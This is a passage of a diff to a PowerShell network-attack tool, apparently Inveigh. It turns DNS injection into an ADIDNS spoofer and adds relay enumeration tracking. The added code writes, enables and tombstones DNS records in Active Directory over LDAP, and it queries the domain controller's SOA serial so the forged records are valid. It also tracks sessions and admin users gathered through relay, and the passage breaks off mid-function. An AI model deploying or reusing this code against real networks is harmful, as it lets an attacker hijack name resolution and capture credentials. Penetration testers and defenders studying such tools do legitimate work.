+ $inveigh.output_queue.Add("[+] ADIDNS Hosts Ignore = " + ($ADIDNSHostsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Domain Controller = $ADIDNSDomainController") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Domain = $ADIDNSDomain") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Zone = $ADIDNSZone") > $null
+
+ if($ADIDNS -eq 'Combo')
+ {
+ $inveigh.request_table_updated = $true
+ }
+
}
else
{
- $inveigh.output_queue.Add("[+] DNS Injection = Disabled") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer = Disabled") > $null
}
if($SMB -eq 'Y' -and $elevated_privilege)
@@ -964,7 +1058,7 @@ if($HTTPS -eq 'Y')
$certificate.InitializeFromPrivateKey(2,$certificate_key,"")
$certificate.Subject = $certificate_distinguished_name
$certificate.Issuer = $certificate_issuer_distinguished_name
- $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotBefore = (Get-Date).AddDays(-271)
$certificate.NotAfter = $certificate.NotBefore.AddDays(824)
$certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
$certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
@@ -1349,56 +1443,55 @@ while($inveigh.output_queue.Count -gt 0)
}
-if($inveigh.relay_running)
-{
- $inveigh.output_pause = $false
-}
-
-# Begin ScriptBlocks
+#endregion
+#region begin script blocks
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
- function DataToUInt16($field)
- {
- [Array]::Reverse($field)
- return [System.BitConverter]::ToUInt16($field,0)
- }
-
- function DataToUInt32($field)
+ function Get-UInt16DataLength
{
- [Array]::Reverse($field)
- return [System.BitConverter]::ToUInt32($field,0)
- }
+ param ([Int]$Start,[Byte[]]$Data)
- function DataLength2
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
+ $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0)
- $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
- return $string_length
+ return $data_length
}
- function DataLength4
+ function Get-UInt32DataLength
{
- param ([Int]$length_start,[Byte[]]$string_extract_data)
+ param ([Int]$Start,[Byte[]]$Data)
- $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
- return $string_length
+ $data_length = [System.BitConverter]::ToUInt32($Data[$Start..($Start + 3)],0)
+
+ return $data_length
}
- function DataToString
+ function Convert-DataToString
{
- param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+ param ([Int]$Start,[Int]$Length,[Byte[]]$Data)
- $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+ $string_data = [System.BitConverter]::ToString($Data[$Start..($Start + $Length - 1)])
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
return $string_extract
}
+ function Convert-DataToUInt16($field)
+ {
+ [Array]::Reverse($field)
+ return [System.BitConverter]::ToUInt16($field,0)
+ }
+
+ function Convert-DataToUInt32($field)
+ {
+ [Array]::Reverse($field)
+ return [System.BitConverter]::ToUInt32($field,0)
+ }
+
function SpooferResponseMessage
{
param ([String]$query_string,[String]$mDNS_type)
@@ -1427,11 +1520,11 @@ $shared_basic_functions_scriptblock =
}
elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
{
- $response_message = "[previous capture from $source_IP]"
+ $response_message = "[Previous $source_IP Capture]"
}
elseif($source_IP -eq $IP)
{
- $response_message = "[ignoring local request]"
+ $response_message = "[Local Request]"
}
elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
{
@@ -1439,20 +1532,20 @@ $shared_basic_functions_scriptblock =
}
elseif($destination_IP.IPAddressToString -eq $IP)
{
- $response_message = "[ResponderGuard detected and ignored]"
+ $response_message = "[ResponderGuard Ignored]"
$response_type = "[!]"
}
elseif($NBNSTypes -notcontains $NBNS_query_type)
{
- $response_message = "[disabled NBNS type]"
+ $response_message = "[NBNS Type Disabled]"
}
elseif($query_string.Trim() -eq '*')
{
- $response_message = "[NBSTAT request]"
+ $response_message = "[NBSTAT Request]"
}
elseif($mDNS_type -and $mDNSTypes -notcontains $mDNS_type)
{
- $response_message = "[disabled mDNS type]"
+ $response_message = "[mDNS Type Disabled]"
}
else
{
@@ -1475,58 +1568,823 @@ $shared_basic_functions_scriptblock =
return $byte_array
}
-
+ function New-RelayEnumObject
+ {
+ param ($IP,$Hostname,$Sessions,$AdministratorUsers,$AdministratorGroups,$Privileged,$Shares,$NetSessions,$NetSessionsMapped,
+ $LocalUsers,$SMB2,$Signing,$SMBServer,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
+
+ $relay_object = New-Object PSObject
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_data.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumeration
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execution
+
+ return $relay_object
+ }
+
+ function Invoke-SessionUpdate
+ {
+ param ([String]$domain,[String]$username,[String]$hostname,[String]$IP)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+ $session = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $hostname_full = ($hostname + "." + $inveigh.domain_mapping_table.$domain).ToUpper()
+ }
+ else
+ {
+ $session = $domain + "\" + $username
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname_full})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname_full} | Select-Object -expand Index
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain
+
+ if($session_entry -like "$domain\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ elseif($inveigh.enumeration_data | Where-Object {$_.IP -eq $IP})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $IP} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $hostname_full
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain
+
+ if($session_list[$i] -like "$domain\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $IP -Hostname $hostname_full -Session $session
+ }
+
+ }
}
# DNS Functions ScriptBlock
-$DNS_functions_scriptblock =
+$ADIDNS_functions_scriptblock =
{
+
+ function Disable-ADIDNSNode
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ $timestamp = [Int64](([datetime]::UtcNow.Ticks)-(Get-Date "1/1/1601").Ticks)
+ $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp))
+ $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)}
+
+ [Byte[]]$DNS_record = 0x08,0x00,0x00,0x00,0x05,0x00,0x00,0x00 +
+ $SOASerialNumberArray[0..3] +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $timestamp
+
+ try
+ {
+ $directory_entry.InvokeSet('dnsRecord',$DNS_record)
+ $directory_entry.InvokeSet('dnsTombstoned',$true)
+ $directory_entry.SetInfo()
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS node $Node tombstoned") > $null
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ }
+
+ function Enable-ADIDNSNode
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Byte[]]$DNSRecord,
+ [parameter(Mandatory=$false)][Int]$Preference,
+ [parameter(Mandatory=$false)][Int]$Priority,
+ [parameter(Mandatory=$false)][Int]$Weight,
+ [parameter(Mandatory=$false)][Int]$Port,
+ [parameter(Mandatory=$false)][Int]$TTL = 600,
+ [parameter(Mandatory=$false)][Int32]$SOASerialNumber,
+ [parameter(Mandatory=$false)][Switch]$Static,
+ [parameter(Mandatory=$false)][Switch]$Tombstone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ try
+ {
+ $directory_entry.InvokeSet('dnsRecord',$DNSRecord)
+ $directory_entry.SetInfo()
+ $success = $true
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS node $Node added") > $null;
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "1"
+ }
+
+ }
+ catch
+ {
+ $success = $false
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "0"
+ }
+
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ return $success
+ }
+
+ function Get-ADIDNSNodeTombstoned
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ try
+ {
+ $dnsTombstoned = $directory_entry.InvokeGet('dnsTombstoned')
+ $dnsRecord = $directory_entry.InvokeGet('dnsRecord')
+ }
+ catch
+ {
+
+ if($_.Exception.Message -notlike '*Exception calling "InvokeGet" with "1" argument(s): "The specified directory service attribute or value does not exist.*')
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ $node_tombstoned = $false
+
+ if($dnsTombstoned -and $dnsRecord)
+ {
+
+ if($dnsRecord[0].GetType().name -eq [Byte])
+ {
+
+ if($dnsRecord.Count -ge 32 -and $dnsRecord[2] -eq 0)
+ {
+ $node_tombstoned = $true
+ }
+
+ }
+
+ }
+
+ return $node_tombstoned
+ }
- function DNSUpdate
+ function New-ADIDNSNode
{
- param ([String]$DNSName,[String]$DNSData,[Int]$DNSTTL)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Type,
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$TTL,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $null = [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols")
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
- $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNSName -DNSData $DNSData -DNSTTL $DNSTTL
+ [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone
+ $identifier = New-Object System.DirectoryServices.Protocols.LdapDirectoryIdentifier($DomainController,389)
- if($DNS_update -eq "[+] DNS update successful")
+ if($Credential)
+ {
+ $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier,$Credential.GetNetworkCredential())
+ }
+ else
{
- $inveigh.DNS_list.Add("1," + $_.Name) > $null
- $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] DNS host (A) record for " + $_.Name + " added") > $null
+ $connection = New-Object System.DirectoryServices.Protocols.LdapConnection($identifier)
}
- elseif($DNS_update -eq "[-] Kerberos preauthentication error 0x06")
+
+ $object_category = "CN=Dns-Node,CN=Schema,CN=Configuration"
+
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $object_category += ",DC=$DC"
+ }
+
+ try
{
- $inveigh.DNS = $false
- $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] Disabling DNS injection due to auth failure") > $null
+ $connection.SessionOptions.Sealing = $true
+ $connection.SessionOptions.Signing = $true
+ $connection.Bind()
+ $request = New-Object -TypeName System.DirectoryServices.Protocols.AddRequest
+ $request.DistinguishedName = $distinguished_name
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectClass",@("top","dnsNode"))) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "objectCategory",$object_category)) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dnsRecord",$DNSRecord)) > $null
+ $request.Attributes.Add((New-Object "System.DirectoryServices.Protocols.DirectoryAttribute" -ArgumentList "dNSTombstoned","TRUE")) > $null
+ $connection.SendRequest($request) > $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS node $Node added") > $null
+ $output = $true
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "1"
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $output = $false
+
+ if($_.Exception.Message -ne 'Exception calling "SendRequest" with "1" argument(s): "The object exists."')
+ {
+ $inveigh.ADIDNS = $null
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "0"
+ }
+
+ }
+
+ return $output
+ }
+
+ function New-SOASerialNumberArray
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][String]$Zone
+ )
+
+ $Zone = $Zone.ToLower()
+
+ function Convert-DataToUInt16($Field)
+ {
+ [Array]::Reverse($Field)
+ return [System.BitConverter]::ToUInt16($Field,0)
+ }
+
+ function ConvertFrom-PacketOrderedDictionary($OrderedDictionary)
+ {
+
+ ForEach($field in $OrderedDictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function New-RandomByteArray
+ {
+ param([Int]$Length,[Int]$Minimum=1,[Int]$Maximum=255)
+
+ [String]$random = [String](1..$Length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $Minimum -Maximum $Maximum)})
+ [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ return $random
+ }
+
+ function New-DNSNameArray
+ {
+ param([String]$Name)
+
+ $character_array = $Name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($Name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $Name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ function New-PacketDNSSOAQuery
+ {
+ param([String]$Name)
+
+ [Byte[]]$type = 0x00,0x06
+ [Byte[]]$name = (New-DNSNameArray $Name) + 0x00
+ [Byte[]]$length = [System.BitConverter]::GetBytes($Name.Count + 16)[1,0]
+ [Byte[]]$transaction_ID = New-RandomByteArray 2
+ $DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
+ $DNSQuery.Add("Length",$length)
+ $DNSQuery.Add("TransactionID",$transaction_ID)
+ $DNSQuery.Add("Flags",[Byte[]](0x01,0x00))
+ $DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
+ $DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
+ $DNSQuery.Add("Queries_Name",$name)
+ $DNSQuery.Add("Queries_Type",$type)
+ $DNSQuery.Add("Queries_Class",[Byte[]](0x00,0x01))
+
+ return $DNSQuery
+ }
+
+ $DNS_client = New-Object System.Net.Sockets.TCPClient
+ $DNS_client.Client.ReceiveTimeout = 3000
+
+ try
+ {
+ $DNS_client.Connect($DomainController,"53")
+ $DNS_client_stream = $DNS_client.GetStream()
+ $DNS_client_receive = New-Object System.Byte[] 2048
+ $packet_DNSQuery = New-PacketDNSSOAQuery $Zone
+ [Byte[]]$DNS_client_send = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
+ $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
+ $DNS_client_stream.Flush()
+ $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
+ $DNS_client.Close()
+ $DNS_client_stream.Close()
+
+ if($DNS_client_receive[9] -eq 0)
+ {
+ $inveigh.output_queue.Add("[-] $Zone SOA record not found") > $null
+ }
+ else
+ {
+ $DNS_reply_converted = [System.BitConverter]::ToString($DNS_client_receive)
+ $DNS_reply_converted = $DNS_reply_converted -replace "-",""
+ $SOA_answer_index = $DNS_reply_converted.IndexOf("C00C00060001")
+ $SOA_answer_index = $SOA_answer_index / 2
+ $SOA_length = $DNS_client_receive[($SOA_answer_index + 10)..($SOA_answer_index + 11)]
+ $SOA_length = Convert-DataToUInt16 $SOA_length
+ [Byte[]]$SOA_serial_current_array = $DNS_client_receive[($SOA_answer_index + $SOA_length - 8)..($SOA_answer_index + $SOA_length - 5)]
+ $SOA_serial_current = [System.BitConverter]::ToUInt32($SOA_serial_current_array[3..0],0) + 1
+ [Byte[]]$SOA_serial_number_array = [System.BitConverter]::GetBytes($SOA_serial_current)[0..3]
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] $DomainController did not respond on TCP port 53") > $null
+ }
+
+ return [Byte[]]$SOA_serial_number_array
+ }
+
+ function New-DNSRecordArray
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Int]$Preference,
+ [parameter(Mandatory=$false)][Int]$Priority,
+ [parameter(Mandatory=$false)][Int]$Weight,
+ [parameter(Mandatory=$false)][Int]$Port,
+ [parameter(Mandatory=$false)][Int]$TTL
+ )
+
+ $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone
+
+ function New-DNSNameArray
+ {
+ param([String]$Name)
+
+ $character_array = $Name.ToCharArray()
+ [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
+
+ if($index_array.Count -gt 0)
+ {
+
+ $name_start = 0
+
+ ForEach ($index in $index_array)
+ {
+ $name_end = $index - $name_start
+ [Byte[]]$name_array += $name_end
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start,$name_end))
+ $name_start = $index + 1
+ }
+
+ [Byte[]]$name_array += ($Name.Length - $name_start)
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+ else
+ {
+ [Byte[]]$name_array = $Name.Length
+ [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($Name.Substring($name_start))
+ }
+
+ return $name_array
+ }
+
+ switch ($Type)
+ {
+
+ 'A'
+ {
+ [Byte[]]$DNS_type = 0x01,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data.Split(".")).Count))[0..1]
+ [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes()
+ }
+
+ 'AAAA'
+ {
+ [Byte[]]$DNS_type = 0x1c,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes(($Data -replace ":","").Length / 2))[0..1]
+ [Byte[]]$DNS_data += ([System.Net.IPAddress][String]([System.Net.IPAddress]$Data)).GetAddressBytes()
+ }
+
+ 'CNAME'
+ {
+ [Byte[]]$DNS_type = 0x05,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'DNAME'
+ {
+ [Byte[]]$DNS_type = 0x27,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'MX'
+ {
+ [Byte[]]$DNS_type = 0x0f,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 6))[0..1]
+ [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Preference)[1,0]
+ $DNS_data += $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'NS'
+ {
+ [Byte[]]$DNS_type = 0x02,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'PTR'
+ {
+ [Byte[]]$DNS_type = 0x0c,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 4))[0..1]
+ [Byte[]]$DNS_data = $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'SRV'
+ {
+ [Byte[]]$DNS_type = 0x21,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 10))[0..1]
+ [Byte[]]$DNS_data = [System.Bitconverter]::GetBytes($Priority)[1,0]
+ $DNS_data += [System.Bitconverter]::GetBytes($Weight)[1,0]
+ $DNS_data += [System.Bitconverter]::GetBytes($Port)[1,0]
+ $DNS_data += $Data.Length + 2
+ $DNS_data += ($Data.Split(".")).Count
+ $DNS_data += New-DNSNameArray $Data
+ $DNS_data += 0x00
+ }
+
+ 'TXT'
+ {
+ [Byte[]]$DNS_type = 0x10,0x00
+ [Byte[]]$DNS_length = ([System.BitConverter]::GetBytes($Data.Length + 1))[0..1]
+ [Byte[]]$DNS_data = $Data.Length
